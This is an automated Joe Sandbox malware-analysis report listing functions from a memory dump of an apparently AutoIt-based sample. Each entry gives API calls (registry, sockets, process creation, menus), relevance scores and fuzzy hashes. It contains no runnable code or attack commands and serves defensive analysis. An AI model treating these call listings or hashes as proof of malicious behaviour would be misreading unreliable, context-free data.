Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: d90d205d992e034ed3fbe6beaace1bd3c4d55622fc67d0f142832d8f8a6c847e
Instruction ID: 13d0ade1a716d079d68fd955fb9001fafacacbb9e0a14742c39d0b50b712feba
Opcode Fuzzy Hash: d90d205d992e034ed3fbe6beaace1bd3c4d55622fc67d0f142832d8f8a6c847e
Instruction Fuzzy Hash: E741AEB1508384AEC752EF65D4459EFB7E8AF99380F40086EF49AC3251EB34D789CB52

Function 00207291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002072AA
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00207351
IsMenu.USER32(?), ref: 00207369
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 002073B1
DrawMenuBar.USER32 ref: 002073C4

Strings

0, xrefs: 0020729E

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: f6e5fb94e0aee8a4e9eff9a2ad128a62b4378e15ec77f2898019995e6c4618a5
Instruction ID: edbce973e38a931e91f16017150c299c5c102dba83c9ab7d2db112e80cb61df1
Opcode Fuzzy Hash: f6e5fb94e0aee8a4e9eff9a2ad128a62b4378e15ec77f2898019995e6c4618a5
Instruction Fuzzy Hash: CE412875A14309EFEB20DF50E884A9ABBF8FB05310F148569FD559B292D730AD60DF50

Function 00200FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00200FD4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00200FFE
FreeLibrary.KERNEL32(00000000), ref: 002010B5

Part of subcall function 00200FA5: RegCloseKey.ADVAPI32(?), ref: 0020101B
Part of subcall function 00200FA5: FreeLibrary.KERNEL32(?), ref: 0020106D
Part of subcall function 00200FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00201090

RegDeleteKeyW.ADVAPI32(?,?), ref: 00201058

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 93fcf5b1786f0f0befc50726d504300871f47da60352a73f4fd6863b976f88d3
Instruction ID: 27999fb6b274e389f960b1e6e3f8e8f53e87ea4956ea3d2b879560ba81dc3eed
Opcode Fuzzy Hash: 93fcf5b1786f0f0befc50726d504300871f47da60352a73f4fd6863b976f88d3
Instruction Fuzzy Hash: 9A311071911209BFEB25DF90DC89EFFB7BDEF08300F000169E945E2192EB745E959AA0

Function 002062CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 002062EC
GetWindowLongW.USER32(011352C8,000000F0), ref: 0020631F
GetWindowLongW.USER32(011352C8,000000F0), ref: 00206354
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00206386
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 002063B0
GetWindowLongW.USER32(00000000,000000F0), ref: 002063C1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 002063DB

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: a25c58109d48c1e3c3925a52fbbbb4078661f3805926c3a81122e16febce74ab
Instruction ID: 0a209f9d8fab9bf175edde013344b4dca459a6f140b85a994da425e2530934dd
Opcode Fuzzy Hash: a25c58109d48c1e3c3925a52fbbbb4078661f3805926c3a81122e16febce74ab
Instruction Fuzzy Hash: 3C31F2346502619FDB208F58EC88F5537E5BB4AB14F1941A4F5519F2F2CB72ACA09B90

Function 001DDAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001DDB2E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001DDB54
SysAllocString.OLEAUT32(00000000), ref: 001DDB57
SysAllocString.OLEAUT32(?), ref: 001DDB75
SysFreeString.OLEAUT32(?), ref: 001DDB7E
StringFromGUID2.OLE32(?,?,00000028), ref: 001DDBA3
SysAllocString.OLEAUT32(?), ref: 001DDBB1

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: afe8f0011edd00356dc49df008343c3247418a4b5a4cbaa0c0f2c4624f43d6e6
Instruction ID: a6f0d5556b814ed4ee392057178df660f8a81484819e7a25d85a25f6e9833227
Opcode Fuzzy Hash: afe8f0011edd00356dc49df008343c3247418a4b5a4cbaa0c0f2c4624f43d6e6
Instruction Fuzzy Hash: 67215176600219AFDF20DFA8EC88CBB77ACEB0A364B068567FE14DB251D7709C418764

Function 001F6173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 001F7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 001F7DB6

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 001F61C6
WSAGetLastError.WSOCK32(00000000), ref: 001F61D5
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 001F620E
connect.WSOCK32(00000000,?,00000010), ref: 001F6217
WSAGetLastError.WSOCK32 ref: 001F6221
closesocket.WSOCK32(00000000), ref: 001F624A
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 001F6263

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: ac036e301fb92376f1d5b895557b7ede999221bb53c0df20cbbf12f99c268600
Instruction ID: 84fc54777c0fcc0085a909f8a09ab41c1167927bade98f0f603ae3a38ec75e4b
Opcode Fuzzy Hash: ac036e301fb92376f1d5b895557b7ede999221bb53c0df20cbbf12f99c268600
Instruction Fuzzy Hash: 1F31B331600208AFDF50AF64DC89FBE77ACEF45754F048029FE05A7292CB70AD049BA1

Function 001DF65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 001DF671
__wcsnicmp.LIBCMT ref: 001DF692
__wcsnicmp.LIBCMT ref: 001DF6AC

Strings

#requireadmin, xrefs: 001DF68C
#notrayicon, xrefs: 001DF669
#OnAutoItStartRegister, xrefs: 001DF6A6

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 8a8b437208a7af8a6acdca4d8f6a17d6253ea735656d2fdc6c8c7dcf0ee33aed
Instruction ID: f8c19b4d2ad0c595376f58ef59217d46f56747d08df8be4888f39a21b1db344d
Opcode Fuzzy Hash: 8a8b437208a7af8a6acdca4d8f6a17d6253ea735656d2fdc6c8c7dcf0ee33aed
Instruction Fuzzy Hash: 842167B62041116AC225AA34AC02FF773D8EF6A340F10403FF84386291EB609F83C395

Function 001DDBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001DDC09
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001DDC2F
SysAllocString.OLEAUT32(00000000), ref: 001DDC32
SysAllocString.OLEAUT32 ref: 001DDC53
SysFreeString.OLEAUT32 ref: 001DDC5C
StringFromGUID2.OLE32(?,?,00000028), ref: 001DDC76
SysAllocString.OLEAUT32(?), ref: 001DDC84

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 1ec0134d06acaa8674005f8c8e6b9db82baa76a154bf84d447418b5d3b07c7d7
Instruction ID: 4f056ca4e0f4a908c154b811a8c224611f601e4702698528a5133d546e7bb80c
Opcode Fuzzy Hash: 1ec0134d06acaa8674005f8c8e6b9db82baa76a154bf84d447418b5d3b07c7d7
Instruction Fuzzy Hash: 60214475604204AFDB24DFA8ED89DAB77ECEB09360B11812AF914CB261D774DC41C764

Function 002075CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00181D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00181D73
Part of subcall function 00181D35: GetStockObject.GDI32(00000011), ref: 00181D87
Part of subcall function 00181D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00181D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00207632
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0020763F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0020764A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00207659
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00207665

Strings

Msctls_Progress32, xrefs: 00207603

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: dfd679c8538e2d92d5c4e930e0ba82c3e3af26ffcf23006467143cd64994aa01
Instruction ID: bc7caa8e4884d25569f86403db81b9b8e623a23c9cce05c177bb6a9bd8ba1508
Opcode Fuzzy Hash: dfd679c8538e2d92d5c4e930e0ba82c3e3af26ffcf23006467143cd64994aa01
Instruction Fuzzy Hash: 0111C8B2550219BFEF119F64CC85EE77F5DEF09798F014114BA05A2091C772AC21DBA4

Function 001A9AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 001A9AE6

Part of subcall function 001A3187: EncodePointer.KERNEL32(00000000), ref: 001A318A
Part of subcall function 001A3187: __initp_misc_winsig.LIBCMT ref: 001A31A5
Part of subcall function 001A3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 001A9EA0
Part of subcall function 001A3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 001A9EB4
Part of subcall function 001A3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 001A9EC7
Part of subcall function 001A3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 001A9EDA
Part of subcall function 001A3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 001A9EED
Part of subcall function 001A3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 001A9F00
Part of subcall function 001A3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 001A9F13
Part of subcall function 001A3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 001A9F26
Part of subcall function 001A3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 001A9F39
Part of subcall function 001A3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 001A9F4C
Part of subcall function 001A3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 001A9F5F
Part of subcall function 001A3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 001A9F72
Part of subcall function 001A3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 001A9F85
Part of subcall function 001A3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 001A9F98
Part of subcall function 001A3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 001A9FAB
Part of subcall function 001A3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 001A9FBE

__mtinitlocks.LIBCMT ref: 001A9AEB
__mtterm.LIBCMT ref: 001A9AF4

Part of subcall function 001A9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,001A9AF9,001A7CD0,0023A0B8,00000014), ref: 001A9C56
Part of subcall function 001A9B5C: _free.LIBCMT ref: 001A9C5D
Part of subcall function 001A9B5C: DeleteCriticalSection.KERNEL32(02$,?,?,001A9AF9,001A7CD0,0023A0B8,00000014), ref: 001A9C7F

__calloc_crt.LIBCMT ref: 001A9B19
__initptd.LIBCMT ref: 001A9B3B
GetCurrentThreadId.KERNEL32 ref: 001A9B42

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: e8f8296817b9d8fbd3fec430d8bcaf500b84b90ef2dc3e3a28fc4e8a5e2e91a9
Instruction ID: 6bbb221f8b5d10ea3e317ee03a1c1febdc867536753072e6d42c715778b7dc83
Opcode Fuzzy Hash: e8f8296817b9d8fbd3fec430d8bcaf500b84b90ef2dc3e3a28fc4e8a5e2e91a9
Instruction Fuzzy Hash: 12F0903E5097115AEB347BB4BC07B4A36909F13730F214A1AF465C60D2EF6084C145A0

Function 0020B635 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0020B644
_memset.LIBCMT ref: 0020B653
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00246F20,00246F64), ref: 0020B682
CloseHandle.KERNEL32 ref: 0020B694

Strings

o$, xrefs: 0020B63E
do$, xrefs: 0020B64D

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID: o$$do$
API String ID: 3277943733-567941765
Opcode ID: 91eb68e617046885a8c05abc0c727eb4e09ad95a7ac93e6abe01f66677e60aa9
Instruction ID: 40c5f6d1e0e5556cfd1b4c95ba91f6306813d722bac3ab3d057877653d058646
Opcode Fuzzy Hash: 91eb68e617046885a8c05abc0c727eb4e09ad95a7ac93e6abe01f66677e60aa9
Instruction Fuzzy Hash: F2F054F55503007AE3102B657C0DF7B3A5CEB1B755F014020FA49D5993D7724C1487A9

Function 001A406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,001A3F85), ref: 001A4085
GetProcAddress.KERNEL32(00000000), ref: 001A408C
EncodePointer.KERNEL32(00000000), ref: 001A4097
DecodePointer.KERNEL32(001A3F85), ref: 001A40B2

Strings

combase.dll, xrefs: 001A4080
RoUninitialize, xrefs: 001A4074

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: fd97b8ed0f59cbbfc9de5cbbc0f648f8747ff9ce566e96e188c7e90698321436
Instruction ID: 2b0f27747cb9f976094fa4c003ae702945f5ac6006f71eff50a1264d4edb415b
Opcode Fuzzy Hash: fd97b8ed0f59cbbfc9de5cbbc0f648f8747ff9ce566e96e188c7e90698321436
Instruction Fuzzy Hash: 9FE0B678591300EFEB60EF61FE0EB853AE4B756742F204064F509E14A1CBF64654DA14

Function 001E64B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 001E660B
_memmove.LIBCMT ref: 001E6546

Part of subcall function 00189837: __itow.LIBCMT ref: 00189862
Part of subcall function 00189837: __swprintf.LIBCMT ref: 001898AC

_memmove.LIBCMT ref: 001E65B9
_memmove.LIBCMT ref: 001E66A0
_memmove.LIBCMT ref: 001E66B9
_memmove.LIBCMT ref: 001E66D5

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 01f6861b9c9f464f3e444165d26c031541feffe0c99e54a007fe9ecc55138285
Instruction ID: ae69179c02835037ed28b2652309108188aa5ffb2693637135239deb98c043d5
Opcode Fuzzy Hash: 01f6861b9c9f464f3e444165d26c031541feffe0c99e54a007fe9ecc55138285
Instruction Fuzzy Hash: 0861AC30500A8A9BCF06FF61CC82EFE37A5AF2A348F494519F8556B192DB35EE05DB50

Function 002001E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00187DE1: _memmove.LIBCMT ref: 00187E22

Part of subcall function 00200E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001FFDAD,?,?), ref: 00200E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002002BD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002002FD
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00200320
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00200349
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0020038C
RegCloseKey.ADVAPI32(00000000), ref: 00200399

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 60b4339129e93b0ebaf81f864859a132ee18cf5b0539a09c3e93cc9a74ce9d16
Instruction ID: 2a7885fcd6562b01bee2bc5cb50d0127421f0312b07777b8d34b4f965ea43497
Opcode Fuzzy Hash: 60b4339129e93b0ebaf81f864859a132ee18cf5b0539a09c3e93cc9a74ce9d16
Instruction Fuzzy Hash: 65517831218301AFD711EF64D885E6EBBE9FF99314F04492DF885872A2DB31EA14CB52

Function 00205799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 002057FB
GetMenuItemCount.USER32(00000000), ref: 00205832
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0020585A
GetMenuItemID.USER32(?,?), ref: 002058C9
GetSubMenu.USER32(?,?), ref: 002058D7
PostMessageW.USER32(?,00000111,?,00000000), ref: 00205928

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 9981ec0e96fa56affb114741aa81d2eaaa0b7e8960e33e68020cac9629539b44
Instruction ID: 328a26e85004ee3078c25611e8da0d6cec48563318952d8e0819d54cfbe4e424
Opcode Fuzzy Hash: 9981ec0e96fa56affb114741aa81d2eaaa0b7e8960e33e68020cac9629539b44
Instruction Fuzzy Hash: BC516D35E0062AEFCF15EF64C845AAEB7B5EF59310F144065EC11AB392CB70AE418F90

Function 001DEEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 001DEF06
VariantClear.OLEAUT32(00000013), ref: 001DEF78
VariantClear.OLEAUT32(00000000), ref: 001DEFD3
_memmove.LIBCMT ref: 001DEFFD
VariantClear.OLEAUT32(?), ref: 001DF04A
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 001DF078

